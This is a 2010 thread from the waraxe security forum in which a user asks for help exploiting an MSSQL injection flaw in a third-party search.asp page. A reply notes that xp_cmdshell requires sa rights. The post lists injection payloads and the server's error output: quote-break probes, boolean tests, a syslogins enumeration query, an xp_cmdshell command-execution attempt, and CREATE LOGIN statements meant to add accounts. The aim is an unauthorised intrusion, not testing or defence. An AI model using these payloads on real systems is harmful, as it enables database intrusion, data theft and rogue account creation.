Waraxe IT Security Portal
Login or Register
July 27, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 221
Members: 0
Total: 221
Full disclosure
CyberDanube Security Research 20240722-0 | Multiple Vulnerabilities in Perten/PerkinElmer ProcessPlus
[KIS-2024-06] XenForo <= 2.2.15 (Template System) Remote Code Execution Vulnerability
[KIS-2024-05] XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability
CVE-2024-33326
CVE-2024-33327
CVE-2024-33328
CVE-2024-33329
CyberDanube Security Research 20240703-0 | Authenticated Command Injection in Helmholz Industrial Router REX100
SEC Consult SA-20240627-0 :: Local Privilege Escalation via MSI installer in SoftMaker Office / FreeOffice
SEC Consult SA-20240626-0 :: Multiple Vulnerabilities in Siemens Power Automation Products
Novel DoS Vulnerability Affecting WebRTC Media Servers
APPLE-SA-06-25-2024-1 AirPods Firmware Update 6A326, AirPods Firmware Update 6F8, and Beats Firmware Update 6F8
40 vulnerabilities in Toshiba Multi-Function Printers
17 vulnerabilities in Sharp Multi-Function Printers
SEC Consult SA-20240624-0 :: Multiple Vulnerabilities allowing complete bypass in Faronics WINSelect (Standard + Enterprise)
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Sql injection -> Mssql Injection?
Post new topicReply to topic View previous topic :: View next topic
Mssql Injection?
PostPosted: Mon Jun 28, 2010 6:11 pm Reply with quote
kr0k0
Advanced user
Advanced user
Joined: Jan 26, 2008
Posts: 128





Hi..;I m not abel to do something here Cuz it give "No permission" Each time I inject sometime..Damn, Maybe you can help me..I will explain more.

Here is the vuln URL..


Code:
http://www.URL.com/think/search.asp


I think It should be like that..

Code:
<form action="http://www.URL.com/think/search.asp" method="POST">
<input name="search_keyword" type="text" value="vsat">
<input type="submit" value="Inject !">


Look at all thes request and all their error given please..

Code:
vsat

work!

Code:
vsat'
vsat'/*
vsat')/*
vsat"/*
vsat"--


SQL Error!..

Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e21'
ODBC driver does not support the requested properties.
/think/search.asp, line 91


Euh It work here..And it give a normal page as "vsat"..
Code:
vsat'--




But I tried with AND/OR/UNION/GROUP BY/ORDER BY/HAVING.. and it didnt work..It give the same SQL error

Code:
vsat' OR 1=1--
vsat' AND 1=1--
vsat' having 1=1--


I will post here what they are all injections that worked well, But it give a normal page as "vsat" nothing else..

Code:
vsat'--
vsat' IF (1=1) SELECT 'true' ELSE SELECT 'false'--
vsat' if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0--
vsat' SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC--
vsat' SELECT CHAR(0x66)--
vsat' SELECT 0x5045--
vsat' SELECT 0x50 + 0x45--


I tried many many functions..But they give "No permission ..."

Code:
vsat' exec master..xp_cmdshell 'dir'--


Code:
Microsoft OLE DB Provider for ODBC Drivers error '80004005'

[Microsoft][ODBC SQL Server Driver][SQL Server]The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.

/think/search.asp, line 364



Code:
vsat' CREATE LOGIN JohnDoe WITH PASSWORD = 'somepassword'--
vsat' RECONFIGURE;--
vsat' CREATE USER WindowsGroup FROM LOGIN WindowsGroup--


Code:
Microsoft OLE DB Provider for ODBC Drivers error '80004005'

[Microsoft][ODBC SQL Server Driver][SQL Server]User does not have permission to perform this action.

/think/search.asp, line 364



SO any answers or help or explanation please share anything with us..
View user's profile Send private message Visit poster's website
PostPosted: Wed Sep 01, 2010 1:23 am Reply with quote
niailuo
Beginner
Beginner
Joined: Aug 31, 2010
Posts: 2




you know,you can use exec.master..xp_cmdshell only at the time when you have the SA permission..
maybe it's a db_owner OR public permission. isn't it ?
Okay .hope you can add me ,and my ICQ:613592918.
I'm so sorry ,i can't speak English very well as I'm a Chinese..
View user's profile Send private message
Mssql Injection?
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.178 Seconds